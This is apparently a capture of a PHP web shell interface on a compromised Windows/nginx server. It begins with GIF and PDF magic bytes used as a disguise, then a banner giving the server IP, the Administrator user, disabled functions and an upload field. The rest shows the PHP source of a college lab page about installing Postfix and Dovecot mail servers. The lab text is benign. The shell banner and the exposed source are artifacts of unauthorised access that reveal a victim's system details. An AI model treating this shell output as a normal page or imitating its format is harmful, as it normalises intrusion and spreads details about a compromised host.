GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST2608/Labs/_Archive/Lab08/ |
Upload File : |
<? // JimMartinson/CST2608/Labs/Lab08/index.php include('Course/courseInfo.phpinc'); include('../../classInfo.phpinc'); $evaluationTitle = "Email Server"; $evaluationNumber = twoDigit($evaluationNumber); $evaluationType = "Lab"; $evaluationTitle = $evaluationTitle; if (strlen($evaluationNumber) == 1) { $evaluationName = $evaluationType."0".$evaluationNumber; $evaluationName = $evaluationType."0".$evaluationNumber; } else { $evaluationName = $evaluationType.$evaluationNumber; $evaluationName = $evaluationType.$evaluationNumber; } if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle; $title = $evaluationType." ".$evaluationNumber.": ".$evaluationTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $js='openCenteredWindow'; include('common/pageHeader.phpinc'); include('JimMartinson/CST2608/Labs/StudentServerNameNAT.phpinc'); include('Gradebook/EvaluationSubmission_BEGIN.phpinc'); require('common/Browser/Browser.phpinc'); $uploadFilename = $courseNumber.'-'.$userFileName.'-'.$evaluationName.'.zip'; $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title.' - '.username($userId); include('common/sectionHeader.phpinc'); ?> <fieldset><legend>Description</legend> Install SMTP and POP3/IMAP email servers and test with an email client. </fieldset> <p> <fieldset><legend>Lab Instruction</legend> <ol start="1"> <li>Install Postfix Mail Transfer Agent (MTA). <ol type="a"> <li>Install Postfix as per Chapter 15.1 <i>Email Services</i> in the <a href="/JimMartinson/CST2608/dn/Ubuntu/Ubuntu12.04_ServerGuide.pdf">Ubuntu 12.04 Server Guide</a>.</li> <li>Configure Postfix to utilize the ~/Maildir directory for mail.</li> <li>You can test your installation by searching for "Telnet SMTP example" and following the example or watch the WebEx.</li> </ol> </li> <li>Install Dovecot Mail Delivery Agent (MDA). <ol type="a"> <li>Install Dovecot Server as per Chapter 15.3 <i>Email Services</i> in the <a href="/JimMartinson/CST2608/dn/Ubuntu/Ubuntu12.04_ServerGuide.pdf">Ubuntu 12.04 Server Guide</a>.</li> <li>Configure Dovecot to utilize the ~/Maildir directory for mail.</li> </ol> </li> <li>Test your installation using Thunderbird. <ol type="a"> <li>Install Thunderbird.</li> <li>Configure Thunderbird to get mail from your server.</li> <li>Sent an email to your <b><?=$Uusername?></b> user using Webin (the <b>Webin/Servers/Postfix Mail Server/User Mailboxes/<?=$Uusername?>/Compose</b> page). Use a subject and message text of "Test from Webin".</li> <li>Send an email to your <b><?=$Uusername?></b> user using using Thunderbird. Use a subject and message text of "Test from Thunderbird".</li> <? $postfix = 'a'; ?> <li>Display the Thunderbird Server Settings dialog. <br>Take a screenshot and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?><?=$postfix?>-<?=$userFileName?>.png</b>. <br><div id="show<?=$evaluationNumber?><?=$postfix?>" class="inline">(<a href="#" onClick="divHide('show<?=$evaluationNumber?><?=$postfix?>'); divShow('<?=$evaluationNumber?><?=$postfix?>'); return false;">Show example</a>)</div> <div id="<?=$evaluationNumber?><?=$postfix?>" class="hidden">(<a href="#" onClick="divHide('<?=$evaluationNumber?><?=$postfix?>'); divShowInline('show<?=$evaluationNumber?><?=$postfix?>'); return false;">Hide example</a>)<br><img src="images/CST2608-Lab07a-JimMartinson.png" width="669" height="607"></div> </li> <? $postfix = 'b'; ?> <li>Display the Thunderbird SMTP Server settings dialog. <br>Take a screenshot and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?><?=$postfix?>-<?=$userFileName?>.png</b>. <br><div id="show<?=$evaluationNumber?><?=$postfix?>" class="inline">(<a href="#" onClick="divHide('show<?=$evaluationNumber?><?=$postfix?>'); divShow('<?=$evaluationNumber?><?=$postfix?>'); return false;">Show example</a>)</div> <div id="<?=$evaluationNumber?><?=$postfix?>" class="hidden">(<a href="#" onClick="divHide('<?=$evaluationNumber?><?=$postfix?>'); divShowInline('show<?=$evaluationNumber?><?=$postfix?>'); return false;">Hide example</a>)<br><img src="images/CST2608-Lab07b-JimMartinson.PNG" width="388" height="298"></div> </li> <? $postfix = 'c'; ?> <li>Display your Thunderbird Inbox showing your two email messages. <br>Take a screenshot and save it as <b style="white-space:nowrap;"><?=$courseNumber?>-<?=$evaluationName?><?=$postfix?>-<?=$userFileName?>.png</b>. <br><div id="show<?=$evaluationNumber?><?=$postfix?>" class="inline">(<a href="#" onClick="divHide('show<?=$evaluationNumber?><?=$postfix?>'); divShow('<?=$evaluationNumber?><?=$postfix?>'); return false;">Show example</a>)</div> <div id="<?=$evaluationNumber?><?=$postfix?>" class="hidden">(<a href="#" onClick="divHide('<?=$evaluationNumber?><?=$postfix?>'); divShowInline('show<?=$evaluationNumber?><?=$postfix?>'); return false;">Hide example</a>)<br><img src="images/CST2608-Lab07c-JimMartinson.PNG" width="854" height="448"></div> </li> </ol> </li> <li>Turn in your assignment: <ol type="a"> <li>Copy <code>/etc/vsftpd.conf</code> to your <b><?=$evaluationName?></b> folder.</li> <li>Make sure the following files are in your <b><?=$evaluationName?></b> folder: <ol type="a"> <li><?=$courseNumber?>-<?=$evaluationName?>a-<?=$userFileName?>.png</li> <li><?=$courseNumber?>-<?=$evaluationName?>b-<?=$userFileName?>.png</li> <li><?=$courseNumber?>-<?=$evaluationName?>c-<?=$userFileName?>.png</li> <li>/etc/postfix/main.conf</li> <li>/etc/dovecot/dovecot.conf</li> </ol> </li> <li>Zip up your <b><?=$evaluationName?></b> folder into a file named <b><?=$uploadFilename?></b>.</li> <li>Browse and select your <b><?=$uploadFilename?></b> file: <input type="file" name="fileUpload"></li> <li>Then <input type="submit" name="f_subtask" value="Submit"> for grading.</li> </ol> </li> </ol> </fieldset> <? include('Gradebook/EvaluationSubmission_END.phpinc'); ?> <fieldset><legend>Grading Criteria</legend> Demonstrated assignment effectively: 10 points. <br> There are some things I expect. If they are incorrect you will lose the following: <br> Incorrect attachment file name: -1 pt. <br> Work submitted incorrectly: -1pt. <br> Incorrect subject in email: -1pt. <br> Second and subsequent submission of work for grading: -1pt. <br> Work submitted late: -1pt per week. </fieldset> <!-- <fieldset class="pio"><legend>Objectives</legend> <ol class="obj pio" start="22"> <li>Describe web hosting.</li> <li>Install and configure web hosting services such as Apache Web Server and PHP.</li> <li>Use web services.</li> </ol> </fieldset> --> <!-- <fieldset><legend>Notes</legend> See <a href="Lab08/Notes">Notes</a>.<br> Here is a <a href="Labs/<?=$evaluationName?>/<?=$evaluationName?>.zip"><?=$evaluationName?>.zip</a> file with examples of what must be turned in as well as pico and sudo scripts to help with the assignment.<br> </fieldset> --> <? include('../../ReferencesResources.phpinc'); include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>